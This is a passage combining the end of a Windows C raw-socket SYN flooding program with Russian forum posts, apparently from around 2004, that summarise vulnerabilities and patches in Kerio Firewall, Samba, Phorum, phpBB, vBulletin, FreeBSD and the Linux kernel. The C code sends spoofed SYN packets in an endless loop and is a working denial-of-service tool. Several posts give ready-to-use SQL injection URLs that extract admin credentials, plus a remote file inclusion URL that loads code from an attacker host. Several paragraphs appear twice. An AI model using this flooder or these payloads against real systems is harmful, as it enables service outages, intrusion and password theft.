static unsigned short sp;
static unsigned char sport[2];
/*
static void ip_csum(unsigned char *ip, unsigned int size, unsigned char *sum)
{
unsigned int csum = 0;
unsigned char *p = ip;
while (1 < size) {
csum += (p[0] << 8) + p[1];
p += 2;
size -= 2;
}
if (size)
csum += *p;
csum = (csum >> 16) + (csum & 0xffff);
csum += (csum >> 16);
sum[0] = (((unsigned short)(~csum)) >> 8);
sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}
*/
static void tcp_csum(unsigned char *tcp, unsigned char *ip,
unsigned int size, unsigned char *sum)
{
unsigned int csum = 0;
unsigned char *p = tcp;
while (1 < size) {
csum += (p[0] << 8) + p[1];
p += 2;
size -= 2;
}
csum += (ip[12] << 8) + ip[13];
csum += (ip[14] << 8) + ip[15];
csum += (ip[16] << 8) + ip[17];
csum += (ip[18] << 8) + ip[19];
csum += 0x06;
csum += 0x14;
if (size)
csum += *p;
csum = (csum >> 16) + (csum & 0xffff);
csum += (csum >> 16);
sum[0] = (((unsigned short)(~csum)) >> 8);
sum[1] = ((((unsigned short)(~csum)) << 8) >> 8);
}
static int work(SOCKET s)
{
DWORD ret = 1;
unsigned char buf[1500];
unsigned char *ip;
unsigned char *tcp;
unsigned int seq = 0x01;
struct sockaddr_in host;
ZeroMemory(buf, 1500);
ip = buf;
tcp = buf + 20;
ip[0] = 0x45; /* ver & hlen */
ip[3] = 0x28; /* tlen */
ip[8] = 0x80; /* ttl */
ip[9] = 0x06; /* protocol */
ip[10] = ip[11] = 0;
ip[12] = sip[0]; /* saddr */
ip[13] = sip[1];
ip[14] = sip[2];
ip[15] = sip[3];
ip[16] = dip[0]; /* daddr */
ip[17] = dip[1];
ip[18] = dip[2];
ip[19] = dip[3];
tcp[0] = sport[0];
tcp[1] = sport[1];
tcp[2] = dport[0]; /* dport */
tcp[3] = dport[1];
tcp[12] = 0x40; /* hlen */ /* HERE */
tcp[13] = 0x02; /* flags */
ZeroMemory(&host, sizeof(struct sockaddr_in));
host.sin_family = AF_INET;
host.sin_port = dp;
host.sin_addr.s_addr = da;
for (;; ) {
tcp[4] = (seq >> 24); /* seq number */
tcp[5] = ((seq << 8) >> 24);
tcp[6] = ((seq << 16) >> 24);
tcp[7] = ((seq << 24) >> 24);
tcp[16] = tcp[17] = 0;
seq ++;
tcp_csum(tcp, ip, 0x14, tcp + 16);
if (SOCKET_ERROR == sendto(s, buf, 0x28, 0,
(SOCKADDR *)&(host), sizeof host)) {
if (WSAEACCES != WSAGetLastError()) {
printf("sendto() failed: %d\n",
WSAGetLastError());
ret = 1;
} else {
printf("You must be Administrator!\n");
}
break;
}
}
return ret;
}
static char usage[] = "Usage: %s dip dport sip sport\n";
int main(int argc, char **argv)
{
WORD ver = MAKEWORD(2, 2);
WSADATA data;
unsigned char *p;
SOCKET s;
int ret = 1;
BOOL eopt = TRUE;
if (5 != argc) {
printf(usage, argv[0]);
goto out;
}
if (INADDR_NONE == (da = inet_addr(argv[1]))) {
printf("dest ip address is NOT valid!\n");
printf(usage, argv[0]);
goto out;
}
p = (unsigned char *)&da;
dip[0] = p[0];
dip[1] = p[1];
dip[2] = p[2];
dip[3] = p[3];
dp = atoi(argv[2]);
dport[0] = ((dp << 16) >> 24);
dport[1] = ((dp << 24) >> 24);
if (INADDR_NONE == (sa = inet_addr(argv[3]))) {
printf("source ip address is NOT valid!\n");
printf(usage, argv[3]);
goto out;
}
p = (unsigned char *)&sa;
sip[0] = p[0];
sip[1] = p[1];
sip[2] = p[2];
sip[3] = p[3];
sp = atoi(argv[4]);
sport[0] = ((sp << 16) >> 24);
sport[1] = ((sp << 24) >> 24);
srand((unsigned int)time(0));
if (WSAStartup(ver, &data)) {
printf("WSAStartup() failed\n");
goto out;
}
if (INVALID_SOCKET == (s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, 0, 0, 0)))
goto err;
if (SOCKET_ERROR == setsockopt(s, IPPROTO_IP, IP_HDRINCL,
(char *)&eopt, sizeof(eopt)))
goto err1;
work(s);
err1:
closesocket(s);
err:
WSACleanup();
out:
return ret;
}
P.S. BSD-шникам. Я надеюсь, вы уже поставили релиз новой фряхи на свой комп? (это в основном про филина...)
Такс. думал, писать эту багу или не писать. решил, что лучше делать маленький но свежий багтрак.
Уязвимость в Kerio Personal Firewall (все "последние" версии)
Обнаружена уязвимость в Kerio Personal Firewall. Удаленный атакующий может вызвать отказ в обслуживании системы.
Уязвимость существует при обработке определенных пакетов. Удаленный атакующий может послать специально сформированный пакет и заставить службу потреблять все доступные ресурсы на системе.
Патч лежит на http://www.kerio.com/kpf_download.html
И так же отказ в обслуживании на Samba версии 3.0.7 и ниже. Патч лежит тут http://www.samba.org/samba/ftp/patches/security/
Уязвимость в Kerio Personal Firewall (все "последние" версии)
Обнаружена уязвимость в Kerio Personal Firewall. Удаленный атакующий может вызвать отказ в обслуживании системы.
Уязвимость существует при обработке определенных пакетов. Удаленный атакующий может послать специально сформированный пакет и заставить службу потреблять все доступные ресурсы на системе.
Патч лежит на http://www.kerio.com/kpf_download.html
И так же отказ в обслуживании на Samba версии 3.0.7 и ниже. Патч лежит тут http://www.samba.org/samba/ftp/patches/security/
Меня тут попросили указывать, что это все для учебных целей. Дак вот указываю - Это все для учебных целей.
Итак, сегодня 3 баги в форумах (это для владельцев сайтов указываю, а не для тех, кто их попытается взломать...)
1) Phorum 5.0.12 и более ранние версии
Обнаружена уязвимость в Phorum. Удаленный атакующий может выполнить произвольный SQL команды на уязвимом сервере.
Уязвимость существует из-за некорректной фильтрации данных в параметре forum_id файла 'follow.php'. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный SQL код на целевом сервере. Пример:
http://[target]/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELECT
%201%2c1%2c1%2 c1%2c1%2cCONCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1
%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1
Следует установить обновление - http://phorum.org/downloads/phorum-5.0.13.tar.gz
2) phpBB 2.0.x-2.0.10
Обнаружено несколько уязвимостей в phpBB. Удаленный атакующий может выполнить произвольный SQL команды и php код на уязвимой системе.
Уязвимость существует при обработке спецсимволов в строке URL. Удаленный атакующий может выполнить SQL-инъекцию и произвольный php-сценарий на уязвимой системе. Пример:
viewtopic.php?t=1&highlight=%2527
Решений пока нету... Ждите на оф. сайте
3) Обнаружена уязвимость в vBulletin. Удаленный атакующий может выполнить произвольный SQL код на уязвимой системе.
Уязвимость существует из-за некорректной фильтрации данных в параметре 'fsel' файла 'last.php'. Удаленный атакующий может с помощью специально сформированного HTTP запроса выполнить произвольный SQL код. Пример:
last.php?fsel=,user.password%20as%20title,u ser.%20
%20%20%20username%20as%20lastposter%20FROM%20user,
thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201
Решения ждите на оф. сайте
Все 3 баги носят статус критических.
Итак, сегодня 3 баги в форумах (это для владельцев сайтов указываю, а не для тех, кто их попытается взломать...)
1) Phorum 5.0.12 и более ранние версии
Обнаружена уязвимость в Phorum. Удаленный атакующий может выполнить произвольный SQL команды на уязвимом сервере.
Уязвимость существует из-за некорректной фильтрации данных в параметре forum_id файла 'follow.php'. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный SQL код на целевом сервере. Пример:
http://[target]/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELECT
%201%2c1%2c1%2 c1%2c1%2cCONCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1
%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1
Следует установить обновление - http://phorum.org/downloads/phorum-5.0.13.tar.gz
2) phpBB 2.0.x-2.0.10
Обнаружено несколько уязвимостей в phpBB. Удаленный атакующий может выполнить произвольный SQL команды и php код на уязвимой системе.
Уязвимость существует при обработке спецсимволов в строке URL. Удаленный атакующий может выполнить SQL-инъекцию и произвольный php-сценарий на уязвимой системе. Пример:
viewtopic.php?t=1&highlight=%2527
Решений пока нету... Ждите на оф. сайте
3) Обнаружена уязвимость в vBulletin. Удаленный атакующий может выполнить произвольный SQL код на уязвимой системе.
Уязвимость существует из-за некорректной фильтрации данных в параметре 'fsel' файла 'last.php'. Удаленный атакующий может с помощью специально сформированного HTTP запроса выполнить произвольный SQL код. Пример:
last.php?fsel=,user.password%20as%20title,u ser.%20
%20%20%20username%20as%20lastposter%20FROM%20user,
thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201
Решения ждите на оф. сайте
Все 3 баги носят статус критических.
Такс. Еще раз напомню, что все для образовательных целей.
А теперь добавлю, что была найдена критическая уязвимость в самба:
Обнаружено переполнение буфера в Samba 3.0 - 3.0.7. Удаленный атакующий может выполнить произвольный код на уязвимой системе.
Уязвимость существует при обработке QFILEPATHINFO запроса. Удаленный атакующий может послать специально сформированный TRANSACT2_QFILEPATHINFO запрос на специально сформированное мя файла, содержащее символы unicode, и вызвать переполнение буфера.
патч на http://www.samba.org/samba/download/
ай, да, забыл сказать - было найдено 10 ошибок в Microsoft Windows XP SP2, но пока они не разглашаются, пока Microsoft патчи не выпустит. так что скоро ждите патчей
А теперь добавлю, что была найдена критическая уязвимость в самба:
Обнаружено переполнение буфера в Samba 3.0 - 3.0.7. Удаленный атакующий может выполнить произвольный код на уязвимой системе.
Уязвимость существует при обработке QFILEPATHINFO запроса. Удаленный атакующий может послать специально сформированный TRANSACT2_QFILEPATHINFO запрос на специально сформированное мя файла, содержащее символы unicode, и вызвать переполнение буфера.
патч на http://www.samba.org/samba/download/
ай, да, забыл сказать - было найдено 10 ошибок в Microsoft Windows XP SP2, но пока они не разглашаются, пока Microsoft патчи не выпустит. так что скоро ждите патчей
Все только для учебных целей и для админов.
1) FreeBSD 4.7, 4.8, 4.9, 4.10, 5.0, 5.1, 5.2.1, 5.3
Обнаружена уязвимость в функции fetch() в FreeBSD. Удаленный атакующий может выполнить произвольный код на уязвимой системе.
Уязвимость обнаружена при обработке HTTP заголовков в функции fetch(). Удаленный атакующий может с помощью специально сформированного HTTP ответа вызвать переполнение буфера и выполнить произвольный код на уязвимой системе.
патч качайте
2) Linux kernel 2.4 - 2.4.27, 2.6 - 2.6.9
Несколько уязвимостей обнаружено в файловой системе smbfs в Linux ядре. Удаленный атакующий может аварийно завершить работу язвимой системы.
Злонамеренный пользователь, контролирующий sbm сервер, или способный произвести атаку man-in-the-middle, может с помощью специально сформированного smb пакета вызвать отказ в обслуживании.
3) Форум phpBB 2.2.1
Уязвимость обнаружена в модуле Cash Mod в phpBB. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.
Уязвимость обнаружена в файле '/admin/admin_cash.php'. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Пример:
http://[target]/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://[attacker]/
1) FreeBSD 4.7, 4.8, 4.9, 4.10, 5.0, 5.1, 5.2.1, 5.3
Обнаружена уязвимость в функции fetch() в FreeBSD. Удаленный атакующий может выполнить произвольный код на уязвимой системе.
Уязвимость обнаружена при обработке HTTP заголовков в функции fetch(). Удаленный атакующий может с помощью специально сформированного HTTP ответа вызвать переполнение буфера и выполнить произвольный код на уязвимой системе.
патч качайте
2) Linux kernel 2.4 - 2.4.27, 2.6 - 2.6.9
Несколько уязвимостей обнаружено в файловой системе smbfs в Linux ядре. Удаленный атакующий может аварийно завершить работу язвимой системы.
Злонамеренный пользователь, контролирующий sbm сервер, или способный произвести атаку man-in-the-middle, может с помощью специально сформированного smb пакета вызвать отказ в обслуживании.
3) Форум phpBB 2.2.1
Уязвимость обнаружена в модуле Cash Mod в phpBB. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.
Уязвимость обнаружена в файле '/admin/admin_cash.php'. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Пример:
http://[target]/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://[attacker]/
Здесь расположена полная версия этой страницы.